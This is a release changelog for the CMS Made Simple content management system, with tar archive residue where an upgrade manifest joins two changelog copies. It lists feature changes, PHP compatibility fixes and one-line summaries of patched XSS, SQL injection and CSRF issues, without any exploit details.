  - Move the designs tab of the main interface into third position.
  - Implement sorting in edit design.
  - Remove option menus (for now) from templates, stylesheets, and designs tab.
  - Modify the template list functionality in edit-design to allow using keyboard control. Space or + to select an item on the left, and right arrow to move.
  - Modify the edit-design functionality to allow clicking on an attached template or stylesheet to edit it.
  - Generic templates now display a usage string.
  - When creating a new template, associate the new template with the default design.
  - Add reset buttons to the filter forms.
  - No longer check for default content block in a template.
  - Adds the ability to export a template to a file within the assets directory, and to import from the assets directory.
  - If a file exists in the assets/templates directory corresponding to a template name, do not allow in-browser editing.
  - Add bulk actions to allow importing and exporting multiple templates.
  - In the template list, if a file exists for a template... display it in the filename column.
  - Adds the ability to export a stylesheet to a file within the assets directory, and to import from the assets directory.
  - If a file exists in the assets/css directory corresponding to a stylesheet name, do not allow in-browser editing.
  - Add bulk actions to allow importing and exporting multiple stylesheets.
  - In the stylesheet list, if a file exists for a stylesheet display it in the filename column.

News v2.51
  - Minor fix to add category.
  - Removes GetNotificationOutput method.
  - Add a task that runs at least every 15 minutes to detect draft articles... create an alert for this.
  - Add an option to never create alerts about draft News articles.
  - Minor optimizations.
  - Adds postdate as parameters in events.
  - now output template help to Navigator.
  - Adds new 'linked file' type field that allows selecting a file using the filepicker.
  - Changes the default summary and detail templates to support the linked_file field type, and uses {thumbnail_url} and {file_url}.

FileManager v1.6.3
  - Move settings to it's own menu item under Site Admin.
  - Fix minor problem with moving a directory.
  - Minor fix to move file functionality.
  - Adds OnFileDeleted event.
  - Adds 'view raw file' icon in each viewable row.
  - Minor formatting changes in file list.
  - Now display clickable path entries for easier navigation.

Search
  - Convert to store all data using the InnoDB engine.
  - Use transactions for the addwords and deletewords stuff for performance.
  - Fix problem with query and record expiry.

AdminSearch v1.0.3
  - Fixes problem with use of 'Use Admin Search' permission.
  - Now searches for matching strings within templates and stylesheets that are stored as files.
  - Now listens to the HasSearchableContent metod when searching content pages.

ModuleManager
  - Now detect if module_custom directories exist and are populated and warn about this before upgrading a module.
  - Minor string changes.
  - Improvements to error handling in the new versions tab.
  - Write a confirmation form for uninstalling a module that displays the UninstallPreMessage or uses a default.
  - Now don't allow disabling / uninstalling myself.
  - Don't hide the upgrades tab when there are no upgrades, but show the number of upgrades in the tab title instead.
  - Now use HTTPS for requests to ModuleRepository.
  - Trigger a hook before exporting a module to XML.

MicroTiny v2.1
  - New version of the tinymce wysiwyg editor.
  - Adds a mailto plugin.
  - Now use the FilePicker module for a filepicker, required rewriting the cmsms_filepicker tinymce plugin.
  - Enable the title attribute on the image plugin.
  - Now uses PUBLIC_CACHE_LOCATION for cache files instead of hardcoding tmp/cache


Version 2.1.6 - Spanish Wells
----------------------------------
Core - General
  - Now attempt to detect if a template name passed into CmsModule::GetTemplateResource() is already a resource string.
  - endswith is now an accepted function in Smarty templates (fixes typo in security policy).
  - Fixes for CmsNlsOperations when using a language detector.
  - Fixes warnings in useroperations.
  - Fixes problem with cms_selflink dir='up' since 2013.
  - Modifies the OneEleven theme to set the meta referrer attribute for security purposes.
  - Modifies the functionality of the CSRF tokens to be more secure (only set the cookie in one location, only set the session variable from the cookie).
  - Increase Admin users list limit.
  - Reduce time limit for daily version check to 3 seconds.
  - cleanValues in Admin log and List Content.
  - Minor fix to the relative_time plugin.
  - Admin menu item URLs can now be built from the remaining members of the object, if not specified.
  - {content_image} and {content_module} now preserve order properly and support the priority attribute.

  - #11198 - Fixes problem with cms_selflink with aliases that starts with a numeric sign.

Content Manager v1.1.4
  - Fix bulk set-non-cachable functionality.
  - Fix a bug wrt content blocks and the adding flag.

Installation Assistant v1.0.4
  - Adds recommended check for ZipArchive.
  - Improves method of determining a temp directory.

ModuleManager v2.0.5
  - Improves functionality if ModuleRepository is not available.

News v2.50.6
  - Minor fix to editing news articles from the Admin interface.


Version 2.1.5 - High Rock
----------------------------------
Core - General
  - Fix fatal error if an extcss stylesheet was placed in the Admin theme.
  - Another minor fix to clearing cached files.
  - Fixes problems where all files (including dot files) had to be writable before creating a module XML file.
  - Fixes minor notice in user operations.
  - Fixes for namespaced modules.
  - Fixes an issue in CmsLayoutTemplate when creating a template from a type.
  - Fixes an issue where a 404 handler error page would not be rendered correctly if for some reason the route did not specify a page id to load.
  - More fixes to cms_url class.
  - Improve the way page aliases are munged when they are supplied.
  - Improve the error generated when a page alias cannot be generated.
  - Minor fixes to the form_start plugin.
  - Minor fixes to generation of moduleinfo.ini.
  - Fix an error message in the autorefresh JavaScript class.
  - Fix problems that could result in uid=1 becoming inactive, and not a member of other groups when edited by another user.
  - Fix query problem in CmsLayoutStylesheetQuery with Mysql 5.7.

  - #11080 - Parameter $adding in GetContentBlockFieldInput always FALSE.
  - #11093 - Bad error message in jquery.cmsms_autorefresh.js.

Content Manager
  - Improve error handling in Edit Content.
  - Fix a problem with the call to GetTabElements.

Design Manager
  - Fix problem with resetting a template back to factory defaults, or creating a new template from factory defaults.

Module Manager
  - Improve the way modules with dependencies are installed and upgraded. (Got rid of the queue stuff).

AdminSearch
  - Use 'Manage Stylesheets' permission, not 'Modify Stylesheets' when searching stylesheets.

Phar Installer
  - Adds missing 'Manage Stylesheets' permission that would not be created on upgrade from 1.12.



Version 2.1.4 - Freetown
----------------------------------
Core - General
  - Fix to the clear_cached_file() method which should fix problems with module installation.
  - Minor tweak to distributed sample htaccess.txt file.

Phar Installer
  - Fixes issues with respect to hanging on step 7 when suhosin PHP addon was installed.
  - Minor PHP7 Fixes.

Module Manager
  - Fixes problems where all files (including dot files) had to be writable before creating a module XML file.


Version 2.1.3 - Black Point
----------------------------------
Core - General
  - Security fix to prevent HTTP_HOST attacks. Many thanks to I-TRACING (www.i-tracing.com) for reporting it!!
  - Remove stub .htaccess files from subdirectories.
  - Update the included sample htaccess.txt file for security.
  - Fix for endless loop when calculating a page alias in utf-8 environments.
  - Fix for endless loop when calculating a page alias and a page name/title ended with -
  - Fixes a notice on the login page.
  - Optimize LoadContentFromId() to be typesafe, and use default page, if the id passed in is invalid.
  - Fix error condition if there were no default default design, or default page template.
  - Fix problem with system verification.

  - #10825 - Admin-account settings don't remember startpage if you set one
  - #10874 - When creating a page and the title has specific characters, CMSMS stops responding
  - #10910 - content and content_module order incorrect Admin page
  - #10911 - 'Use Admin Search' permission not being used in 2.1.2
  - #10921 - Content Field to Display in Name Column not used

AdminSearch v1.0.1
  - Minor fix to permissions checks.

Navigator v1.0.3
  - Improved exception handling on install

News v2.50.5
  - Fix error condition if no results were returned.

Installation Assistant v1.0.3.1
  - Tweaks to README files.
  - Improved error handling in some circumstances.
  - Fix some PHP7 issues.

FileManager
  - #10871 - Filemanager moving folder


Version 2.1.2 - Andros Town
----------------------------------
Core - General
- Minor fix to missing language string stuff
- Fixes to home page preferences
- API documentation fixes (minor)
- Fixes for ajax_content (the Ajax routine behind the parent selector in edit content) to handle ordering inconsistencies
- Remove die statement in is_email
- Minor fix to the relative_time modifier
- Upgrade CMSMailer to 6.2.14
- Now do a check for E_ALL in the system info

News v2.50.4
- Now all field definitions can be deleted
- Minor fix to default action if no results were returned...

ModuleManager v2.0.2
- Revamp module dependency calculations when installing a module
- Minor fix for some notices in install and upgrade modules
- Minor typo fixes
- Minor fixes for PHP7

MenuManager  v1.50.2
- make sure that uninstall cleans up properly

MicroTiny v2.0.3
- minor template fix
- fixes for stylesheet overrides


Version 2.1.1 - Nicholls Town
----------------------------------
Core - General
- Fix the template compiler so that content blocks can be placed within sub templates and detected with the {include} tag
- Fix minor problem with checksum verification
- Fix to the cms_cache_handler class
- Minor fix to SetAllPageHierarchies()
- Correct location where session was started in frontend displays
- Fix the default option for {content_image}
- Modify the locker to use a beacon if supported, when unlocking
- Fix missing permissions when a 1.12 site was upgraded (installation assistant)

CMSContentmanager v1.1
- Minor template changes in edit content wrt. locking
- Adds ability to clear content locks (Admins can clear all locks, regular users can only clear their locks)
- Enhancements to the action to bulk set designs to show only page templates by default, but to optionally show more

DesignManager v1.1.1
- Minor template changes in edit content wrt. locking
- Adds ability to clear template and CSS locks (Admins can clear all locks, regular users can only clear their locks)


Version 2.1 - Bahamas
----------------------------------
Core - General
- Minor performance tweaks to sample htaccess.txt
- Minor fix to the ProcessTemplateFromDatabase module API method.
- Improvements and re-factor the way headers are sent wrt caching
- Add a new method to the ModuleOperations class to allow a module to be within a namespace.
- Enhances the Group class.
- Enhancements and fixes to the cms_url class.
- Modified the $mod->smarty reference to be smarter... it is now deprecated.
- Fixes issue with https requests (#10697)
- Modifies The CmsLayoutTemplate class and CmsLayoutTemplateQuery to allow filtering on listable or non listable
  or setting a template as listable (default) or non listable
- Fixes a problem with styling of the login form if tasks must be run AND a module needs upgrading.
- Fixes to the cloning of templates in CmsLayoutTemplate
- Fixes problem with SetAllHierarchyPositions that cleared the entire cache instead of only the necessary part of it.
- Adds the unloadCancel handler to the lockManager jQuery plugin.
- Moves version.php and include.php inside the lib directory so that they are easier to protect from unwanted direct access.
- Fixes to page alias tests when manually entering a page alias.
- Missing language strings are no longer output to Admin log, but to the debug log.
- Requests for modules that are not installed/enabled, or for invalid actions will now result in 404 errors.
- Fixed problem where restricted content editors could implicitly change the page alias.
- Improvements to the system information page, particularly the bbcode output.
- cms_init_editor, form_start, and cms_action_url plugins are no longer cachable.
- Adds the 'adminonly' option to the {content}, {content_image}, and {content_module} tags to allow only members of the 'Admin' group to manipulate the values of that block.
- Add a trivial check to the sitedown message to make sure that it is not empty.
- Minor fixes for PHP 7

MicroTiny v2.0.2
- Now add page hierarchy to autocomplete text when using the linker.
- Now use $smarty->CreateTemplate for clarity when compling the config template
- Now explicitly assign urls so that they do not get caced by smarty.
- Slightly tweak the default HTML content in the example tab.
- Updated tinymce to the latest 4.2.7 version, included the 'paste' plugin, and turned on 'paste_as_text'.
- Added the ability to enable the table plugin, now distribute the table plugin

CMSContentManager v1.0.2
- Fix problem with pagedefault metadata.
- Fixes for handling no listable templates for a design
- More work with locking.  With only one exception all locking and unlocking is initiated via javascript.
- Minor fix to copycontent

DesignManager v1.1
- Adds ability to toggle the listability of a template.
- Fixes problems with lost changes if there is a syntax error in the template.
- More work with locking.  With only one exception all locking and unlocking is initiated via JavaScript.

News v2.50.3
- Fixes minor issue with pagination in News Admin console.
- Fix errors in the default form template.
- Fixed URL to long issues on redirection after adding/editing article.

Search v1.50.2
- Minor PHP7 fixes.

ModuleManager 2.0.1
- Minor fix to which modules could be uninstalled and deactivated.


Version 2.0.1.1 - Adelaide
----------------------------------
Fix to the $this->smarty magic method in the module class to resolve to the action template or the global Smarty.


Version 2.0.1 - Adelaide
----------------------------------
Core - General
- Improved optimization in ContentOperations::SetAllHierarchyPositions.
- Fixed return type of ContentOperations::GetPageIdFromAlias().
- Help for the {cms_html_options} plugin.
- Change the default page template to use {Navigator}.
- Explicitly force $smarty->fetch() to create a new template, and therefore a new scope. Keep track of scopes in a stack.
- Change prototype to CMSModule::DoActionBase to pass in the current template object.
- SITENAME is now assigned as a Smarty global.
  (fixes some variable scope issues)
- Fix problem with changing content types.
- Fix problem with CmsLayoutTemplateQuery wrt the editable option, that generated an SQL error.
  (resolves problems where people have additional editor access to templates, but no other design manager permissions).
- Fix minor JavaScript errors in plugin (error checking).
- Fix problems where If assign was passed to a {content} tag, do not pass it to the module on a mact request.
- Implements the completely forgotten 403 exception stuff and the IsPermitted content method.
- Improve the cmsms_dirtyform jQuery plugin to support the unload handler and an onUnload callback.
- Fixed the jQuery page selector plugin when the current value points to an invalid page,  and fixes for asynchronous Ajax.
- Adds a globally available cms_busy() JavaScript function for the Admin.
- Fix problem with html entitites in email addresses in user settings.
- Fix problem with {content cssname=string} and quotes.
- Changed cmsms plugins to use $smarty->getTemplateVars() instead of $smarty->get_template_vars() because of scope issues.
- Minor fix to {form_start} when not used in a module.
- Improved error handling for cms_stylesheet.  Now will generate a message in the Admin log, and an html comment on error.

CMSContentManager v1.0.1
- Fixes for changing content types.
- Adds a title for some contextual help if a template is not available for a content item.
- Clear any locks if an exception occurred while submitting a content item.
- Improvements to error handling with apply and preview.
- Content list now refreshes every 30 seconds to display up-to-date lock information.

DesignManager v1.0.1
- Clear the type_default flag when copying a template.
- Clear any locks if an exception occurred while submitting a template.
- Clear any locks if an exception occurred while submitting a stylesheet.
- Template and stylesheet lists now refresh every 30 seconds to display up-to-date lock information.
- Fixes for design exporting templates with protocol-less URLs in them.

MenuManager v1.50.1
- Changes to createSmartyTemplate calls (now use $smarty->get_template_parent()).

Navigator v1.0.1
- Changes to createSmartyTemplate calls (now use $smarty->get_template_parent()).
- Minor change to the help ($node->children_exist)

Search v1.50.1
- Changes to createSmartyTemplate calls (now use $smarty->get_template_parent()).

News v2.50.1
- Changes to createSmartyTemplate calls (now use $smarty->get_template_parent()).
- Fix problem with custom fields not being assigned in fesubmit.
- Fix minor problem with html entities in the detail template parameter.

FileManager v1.5.1
- Fix minor problem with Smarty scope in the drop zone.


Version 2.0 - Australia
----------------------------------
+++ Initial Release +++
MANIFEST.DAT000066600000000524144640034570006320 0ustar00MANIFEST GENERATED: 1691354927
MANIFEST FROM VERSION: 2.2.17
MANIFEST FROM NAME: Iqaluit
MANIFEST TO VERSION: 2.2.18
MANIFEST TO NAME: Apex
CHANGED :: cefdb77ae4dabdf4a5ccc10d5d1244dd :: doc\CHANGELOG.txt
CHANGED :: 9690ae59cf5e805f738ad98fd019aed1 :: lib\compat.functions.php
CHANGED :: 1f6ecd8bff5a2c6216451c7c1fd6cbda :: lib\version.php
Version 2.2.19 - Selkirk
-------------------------------

Core - General
 - BR #12647 - Wrong default action value in get_pageid_or_alias_from_url
 - FR #12638 - ability to add CSP headers on the backend: currently weak restrictions: self with script-src and script-src-elem set to unsafe-inline (optionally set on config admin_csp_header);
 - BR #12661 - fix page_selector allow_all parameter and set default to false;
 
Content Manager 1.1.12
 - BR #12635 - Apply button is shown for non-existing page;
 - BR #12474 Taking the default page down by accident through the content type;

File Manager 1.6.16
 - BR #12659 - FileManager upload Warning bug fix;

FilePicker 1.0.7
 - BR #12621 - FilePicker upload bug;
 - BR #12659 - FilePicker upload Warning bug fix;

Navigator 1.0.10
 - BR #12528 Navigator call doesn't clear excluded prefixes in some situations

Version 2.2.18 - Apex
-------------------------------
Core - General
 - Fallback function CMSMS\strftime. PHP Intl extension still recommended. The fallback solves issues on hosts that don't install it by default and don't allow users to install it.

Version 2.2.17 - Iqaluit
-------------------------------
Core - General
 - BR #12529 - Cacheable Pages have Bad Header Last-Modified;
 - BR #12543 - Lib file corrections;
 - BR #12618 - HasChildren() is broken;
 - BR #12587 - can't uninstall modules;
 - Compatibility fixes for PHP 7, 8.0 and 8.1;
 - Smarty upgraded to version 4.2.1;
    Note: Smarty 2 syntax is still supported, but deprecated
 - Add function CMSMS\strftime to replace deprecated PHP function. PHP Intl extension recommended to support this.
 - Enabled use of PHP functions trim,ltrim,rtrim in smarty templates
 - PHPMailer upgraded to version 6.6.0.
 - fixes BR #12529 Cacheable Pages have Bad Header Last-Modified;
 - added module's support for arrays in parameters;
 - Fixes to cms_mailer class mainly in terms of proxy design pattern getters and setters and autotls settings;
 - Smarty security policies changes: due to some modifications in the way updated Smarty now behaves, all static classes need to be registered for its use to be allowed in templates.

Content Manager 1.1.10
 - Differentiate new page from cloned page.
 - Compatibility fixes for PHP 7, 8.0 and 8.1.

Design Manager 1.1.10
 - BR #12545 - Module: DesignManager typo info on top file.
 - fixes typo BR #12545
 - Compatibility fixes for PHP 7, 8.0 and 8.1.

FilePicker 1.0.6
 - BR #12539 - Module FilePicker 1.0.5 files corrections.
 - Compatibility fixes for PHP 7, 8.0 and 8.1.

Module Manager 2.1.9
 - BR #12541 - Module ModuleManager 2.1.8 : corrections + compatible php 7.1.0 to 8.1.4.

News 2.51.12
 - BR #12543 - Lib file corrections.
 - Compatibility fixes for PHP 7, 8.0 and 8.1.

FileManager 1.6.13
- Compatibility fixes for PHP 7, 8.0 and 8.1.


Version 2.2.16 - Truro
-------------------------------
Core - General
  - BR #12370 - Admin Log-Download : now downloading the log honors all filters but doesn't process paging.
  - BR #12437 - Installer won't allow "<" symbol in database password.
  - BR #12457 - Event Manager empty list when mysql mode only_full_group_by.
  - BR #12484 - Cannot exit after Run UDT.
  - BR #12495 - MySQL 8.0.2+ breaks groups without table prefix.
  - BR #12499 - adminlog.tpl Wrongly formed date.
  - BR #12500 - NameQuote function does not work properly.
  - BR #12504 - Function call notification.
  - Fixed an issue with specific characters in a content block tab name breaking the editor.
  - Adjust regex's incompatible with PCRE2.
  - Avoid deprecated strftime() - deploy new replacement function locale_ftime() and new modifier-plugin localedate_format.
  - A number of fixes for PHP 8 compatibility.

Admin Search v1.0.6
  - BR #12443 - Admin Search fails on some searches with default mysql mode only_full_group_by (mysql 5.7.5+).
  - Removed license and copyright notices from module help text.
  - Escaping the search input field values.
  - More content object attributes are searched.
  - User Defined Tags can be searched.
  - Only places a user has permission to search are shown in the filter list (cached!).

Content Manager v1.1.9
  - Fix menu text/title setting.

FileManager v1.6.12
  - BR #12435 - Replacing an image file in filepicker doesn't update thumbnail.

FilePicker v1.0.5
  - FR #12483 - Additional FilePicker Help for usage as Content Block.

Navigator v1.0.9
  - BR #12456 - Navigator breadcrumbs with default page hidden from menu causes PHP notice.

Search v1.53
  - Added 'Manage Search' permission.
  - BR #12391 - Core search issue page/entry titles that start with numbers.
  
Phar Installer v1.3.15
  - Fixed BR #12437 - Installer won't allow "<" symbol in database password.
  - Added Russian lang file to installer.
  - use locale_ftime() instead of deprecated strftime().
  - escape name of groups table, to prevent reserved-word conflict when table-prefix is empty.
  - alterations to the links in final step: we now privilege links to CMSMS channels of contact and support.


Version 2.2.15 - Bonaventure
-------------------------------
Core - General
  - BR #12287 - Admin shortcuts popup refers to IRC.
  - BR #12292 - showbase parameter of metadata tag doesn't accept boolean value.
  - BR #12303 - No date displayed in the admin + category id not incremented.
  - BR #12305 - Removing actual Destination Page breaks Destination Page dropdown in Internal Page Link pages.
  - BR #12311 - log_performance_info - undefined variable: queries.
  - BR #12313 - 5 Stored XSS vulnerabilities in Settings - Content Manager.
  - BR #12317 - XSS on Settings News Module.
  - BR #12325 - Several XSS vulnerabilities.
  - BR #12335 - User pref admin homepage not properly displayed under certain conditions.
  - BR #12337 - GetContentBlockFieldInput $adding always false.
  - BR #12338 - Allow http/2 responses.
  - BR #12357 - Filepicker dropzone size issue.
  - FR #12345 - More user friendly admin session handling (partly implemented).
  - FR #12349 - Swap tabs on System Maintenance page.
  - Browsing to the main admin page in a new browser tab during a running session won't redirect to login form anymore.
  - (Error) messages in OneEleven won't dismiss on click.
  - Fix to Admin redirection after login on Windows platform.
  - Fix to the module API redirection to support arrays in parameters.

FileManager v1.6.12
  - Dropzone improvement like core FilePicker.

FilePicker v1.0.5
  - BR #11673 - FilePicker will not show svg images, when in the Content Manager.
  - BR #12312 - Stored XSS vulnerability in File Picker.

News v2.51.11
  - Minor code fix to encoding title content.
  - BR #12322 - Stored Cross-Site Scripting. Minor, because it can only be performed by a person that has access rights to the Admin panel.
  - BR #12325 - Several XSS vulnerabilities.

Design Manager v1.1.9
  - Minor fixes for PHP warnings\notices.

Module Manager v2.1.8
  - BR #12291 - Reflected Cross site scripting.
  - BR #12324 - Stored Cross-Site Scripting. Minor, because it can only be performed by a person that has access rights to the Admin panel.
  - Increased the Download Chunk Size field size to 4.

MicroTiny v2.2.5
  - BR #12351 - Escaping translation strings in tinymce_config.js.

Search v1.52
  - FR #11886 - Include module and modulerecord fields for content pages.

Phar Installer v1.3.13
  - Fixes to the reload button: now prevents browser's caching.
  - BR #11591 - fixed: Phar installer doesn't work with OPCache enabled.


Version 2.2.14 - T'Sou-ke
-------------------------------
Core - General
  - BR #12280 - Add Shortcut from Shortcuts modal broken.
  - Fixes to the class.CmsAdminThemeBase.php regarding main sections title and breadcrumbs generation.
  - Explicitly add function_exists and getimagesize functions to the allowed functions in PHP secure mode.
  - Improved Error Console template.
  - Site Prefs, remove submit confirmation.
  - System Maintenance, remove confirmation update page hierarchy positions and routes.
  - cms_http_request PHP 7.4 fix "Array and string offset access syntax with curly braces is deprecated".
  - Backend users, fixed the bulk actions.
  - BR #12172 - CronJobTrait undefined constants.
  - BR #12227 - Stored Cross-Site Scripting. Minor, because it can only be performed by a person that has access rights to the Admin panel.
  - BR #12272 - Internal page link - selecting destination page problem.

AdminSearch v1.0.5
  - Remove click thru warning.

CMSContentManager v1.1.9
  - Fix notices in edit content template.
  - Fix notice in default admin view.

DesignManager v1.1.8
  - BR #12225 - Reflected Cross-Site Scripting. Minor, because it can only be performed by a person that has access rights to the Admin panel.

FileManager v1.6.11
  - Don’t disable advanced mode on upgrade.
  - Fix adding double // in site root link.
  - BR #12215 - FileManager 1.6.10 crashes when trying to rename a file.
  - BR #12224 - Reflected Cross-Site Scripting. Minor, because it can only be performed by a person that has access rights to the Admin panel.

News v2.51.9
  - Minor code fix.
  - Alert on unapproved articles disabled by default. Enable at Settings >> Options tab.
  - BR #12207 - Can't display image in news when using upload field.
  - BR #12228 - Stored Cross-Site Scripting. Minor, because it can only be performed by a person that has access rights to the Admin panel.

Phar Installer v1.3.9
  - PHP 7.4 fix "Array and string offset access syntax with curly braces is deprecated".
  - PHP 7.4 fix "Function get_magic_quotes_runtime() is deprecated".

Search v1.51.8
  - PHP 7.4 fix "Array and string offset access syntax with curly braces is deprecated".


Version 2.2.13 - Moosomin
-------------------------------
Core - General
   - Explicitly add a function or two to the allowed functions in PHP secure mode.

DesignManager v1.1.7
   - Fix a warning in PHP 7.3+.

FileManager v1.6.10
   - Fix minor XSS vulnerabilities in FileManager.

News v2.51.8
   - Fix a security issue in the default action with the idlist param.
   (This version was also separately released in the forge).


Version 2.2.12 - Osoyoos
-------------------------------
NOTICE: Due to the nature of the security issue fixed in FileManager after upgrading you should change your database password.

Core - General
  - Fix warning in cms_html_entity_decode.

FileManager v1.6.9.1
  - Security fixes for view action.


Version 2.2.11 - Vulcan
-------------------------------
Core - General
  - Fix minor bug in copying content objects.
  - Minor fix to array indexes when filling params in ContentBase.
  - Fix to the {cms_filepicker} plugin.
  - Minor fix to the 'my account' form.
  - Fix error in cmsms_filepicker.js encountered in LISE.
  - PHP 7.3 fix to DataDictionary::RenameColumnSQL.

CMSContentManager v1.1.8
  - Fix an issue with copying non-core content objects.
  - Minor fixes for php 7.3.

ModuleManager v2.1.7
  - Minor exception handling improvements.
  - Minor improvement to dependency detection with modules that do not exist in ModuleRepository.
  - Minor fixes for php 7.3.

News v2.51.6
  - Minor improvements for CMSMS v2.3 compatibility.

Phar Installer v1.3.8
  - Minor change to use include() instead of include_once()... not sure why.

FilePicker v1.0.4.1
  - Fix type error.

Search v1.51.7
  - Minor fixes for php 7.3.


Version 2.2.10 - Spuzzum
-------------------------------
Core - General
  - Fix minor potential authenticated object insertion vulnerability in changegroupperm.
  - Fix minor potential uncleaned input vulnerability in siteprefs.
  - Minor improvement to get_real_ip().
  - Fix to clearing cache in cms_filecache_driver.

News v2.51.5
  - Fix unauthenticated SQL injection vulnerability with the default action.

ModuleManager v2.1.6
  - Fix authenticated object insertion vulnerability in the installmodule action.
  - Improve ordering of the dependencies before installing or upgrading modules.
  - Adds more auditing, particularly in the cached request stuff.

FilePicker v1.0.4
  - Fix authenticated object insertion vulnerability.


Version 2.2.9.1
-------------------------------
Core - General
  - fix to the CmsLayoutStylesheetQuery class.
  - fix an edge case in the Database\Connection::DbTimeStamp() method.

MicroTiny v2.2.4
  - Minor fix in error displays.

Phar Installer v1.3.7
  - Fix to edge case in step 3 where memory_limit is set to -1.


Version 2.2.9 - Blow Me Down
-------------------------------
Core - General
  - PHP 7.2+ fixes.
  - Now do not call Module::InitializeAdmin() or Module::InitializeFrontend() if the module loading is being forced
    (as is the case sometimes within ModuleManager);
  - Minor changes and fixes to prevent warnings/notices in CLI based scripts.
  - Improvements to the {browser_lang} plugin.
  - Fixes a bug in the CmsLayoutTemplateQuery class.
  - Fixes a bug with the name= parameter in the {cms_stylesheet} plugin.
  - Fixes a minor issue in system information (smarty compilecheck).
  - Fixes a minor issue with the tabIndex and accesskey fields in edit content.
  - Fixes issue in the CmsLayoutStylesheet class related to associating designs with new stylesheets.
  - Now check for an english language file first in module_custom/xxxxx/lang before a file for the current language.
  - Prevent false-positive hit for "multiple_webshells_0018" rule webserver virusscanner (https://github.com/Yara-Rules/rules/blob/master/Webshells/WShell_THOR_Webshells.yar#L4764).
  - Fixes a bug in ContentOperations::LoadAllContent() if the content list had a custom content type from a module that was unvavailable.
  - Fixes a bug in the Database\Connection::DbTimeStamp().

Search v1.51.6
  - Minor fixes to help.

MicroTiny v2.2.3
  - More entropy in the mt_config.js filename to fix issues with js caching when switching users.
  - Fixes in the cms_linker plugin for when trying to change a link to a CMSMS page where the alias has changed.

FileManager v1.6.8
  - Fixes an upload issue.

ModuleManager v2.1.5
  - PHP 7.2+ fixes.

CMSContentManager v1.1.7
  - Fixes an issue with changing content type after copying a content page.

DesignManager v1.1.5
  - Fixes ownership issue on templates with importing a design.

Phar Installer v1.3.7
  - Minof fix to detect when PHP's memory limit is set to -1.


Version 2.2.8 - Flin Flon
----------------------------------
Core - General
  - Re-introduce the host_whitelist config entry that got lost in some commit somewhere.
  - Minor fix to pagination in Admin log.
  - Change Finnish locale priorities so that UTF-8 is first.
  - Minor fix to calling hooks with a single associative array parameter.
  - Adds new HookManager::do_hook_first_result() method.
  - cangegroupperms now calls HookManager::do_hook_first_result.
  - Minor enhancement to moduleoperations::_load_module() to check if the class exists.
  - Minor enhancement to {cms_action_url} wrt. the page to link to if not specified.
  - Deprecate CMSModule::SetParameterType and CMSModule::CreateParameter methods.
  - Deprecate ModuleOperations::GetModuleParameters() method.
  - CMSModule::RestrictUnknownParameters() now does nothing.
  - No longer warn if a module is sent a parameter that is not registered.
  Note: modules should now be cleaning parameters directly (see filter_var) from $_POST and $_REQUEST ($_GET is automatically cleaned).
  Note: In the future,  $params in module actions will only consist of parameters passed on the module tag.
  - PHP 7.2+ fixes.
  - Fix the inactive param in the page_attr plugin.

FilePicker v1.0.3
  - Minor fix to delete action.

Search v1.51.5
  - Now enforce utf-8 on preg_split.
  - Minor parameter check.
  - Removed deprecated each() function.

CMSJobManager v0.1.3
  - Notices fixed.
  - PHP 7.2+ fixes.

FileManager v1.6.7
  - Remove un-necessary files that may cause a security vulnerability.
  - prevent creating directories with leading or trailing whitespace in the name.

Module Manager v2.1.4
  - PHP 7.2+ fixes.

Navigator v1.0.9
  - Template fix simple_navigation.tpl. Output correct class for parent without active children.

News v2.51.4
  - Notices fixed.


Version 2.2.7 - Skookumchuck
----------------------------------
Core - General
  - Change internal CSRF variable name.
  - Fix object insertion bug via deserialize in LoginOperations.
  - Fix issue where login cookie contents could be forged by determining the hashing salt.
  - Refactor the mechanism for generating and verifying admin account password reset codes.

FileManager v1.6.6
  - No longer allow uploading files with names that end in .

FilePicker v1.0.2
  - No longer allow uploading files with names that end in .

Search v1.51.4
  - Minor fix to microtime calls.


Version 2.2.6 - Come by Chance
----------------------------------
Core - General
  - Fixes to AdminAlerts::load_by_name().
  - SetMessage() and SetError() in the module API now use session variables.
  - Remove support for module_error and module_action request parameters in admin module actions.
  - Add call to check_login() in admin actions that were missing them.

Search v1.51.3
  - Fix notice in PHP 7.1: A non well formed numeric value encountered...


Version 2.2.5 - Wawa
----------------------------------
Core - General
  - Fix minor security issue in the way login information was cached in cookies and the session.
  - Simplify rules around alias editing/generation in fillparams.
    If the alias field exists then we can adjust its value or recalculate an alias.
    Use basic properties, and ownership and permissions to determine if that field exists on the edit form.
  - Minor fixes to the CmsJobManager.


Version 2.2.4 - Little Paradise
----------------------------------
Core - General
  - Improvements to the Hook class.
  - Minor fix to usertagoperations.
  - Changes to the hierarchy selector to disallow circular references.
  - Fix problems with additional editors causing page aliases to be regenerated.
  - Minor fixes to Admin log browser.
  - Minor fixes to Admin login.
  - Add missing call Core::LoginPre hook.
  - Modify myaccount.php to call Core::EditUserPre hook BEFORE the password is set.
  - Fix documentation to CallUserTag.
  - Fix to default handling for content_image block.
  - Improve the help for the {page_attr} plugin.
  - Fix a potential warning in the {anchor} tag.
  - Fix boolean comparison in LoginOperations.

Installation Assistant v1.3.4
  - Fixes endless recursion issue with setting a tmpdir.
  - Fix issue with requiring a database prefix on upgrade.

FilePicker v1.0.2
  - Now allow specifying a 'useprefix' boolean parameter to the action url which will use the current top directory.
  - Add a prefix on all returned strings.
  - Slight modification to the profile class.
  - Now sends the FileManager::OnFileUploaded hook the same way as FileManager does.
  - Adds an exception handler around the change working directory stuff.

FileManager v1.6.5
  - Change upload action to call FileManager::OnFileUploaded hook before creating the thumbnail to allow a hook to rename the uploaded file.
  - Now enable creation of thumbnails on install.

MicroTiny v2.2.2
  - Minor fix for the filepicker if using a default filepicker profile that specifies a top directory.
  - Re-adds the table plugin (went missing when we upgraded tinymce).

ModuleManager v2.1.3
  - Adds audit line displaying status if cannot connect to ModuleRepository.

DesignManager v1.1.4
  - Fixes problems with the cancel button not marking the form as 'clean' (not dirty).


Version 2.2.3.1 - Happy Adventure
----------------------------------
Core - General
  - Fix an issue when parsing multiple content blocks.


Version 2.2.3 - Happy Adventure
----------------------------------
Core - General
  - Fixed a redirect loop problem on mixed HTTP/HTTPS sites when the secure flag was set on some pages.
  - Fixed a problem with prefilters and postfilters not working if placed in /assets/plugins.
  - Now use our own derivative of Smarty Internal Template so that we can send hooks, etc.
  - Improved error message if there was an error parsing the template (or a duplicate content block).
  - Fixes content blocks, image blocks, module blocks containing whitespace in the name.
  - Minor fix to {cms_filepicker} plugin.
  - Improve the CmsModuleInfo class such that if the module class file is newer it will be loaded.
  - Now generate the moduleinfo.ini file automatically on install or upgrade of a module.
  - Increase the maxlength attribute for password input boxes in myaccount.
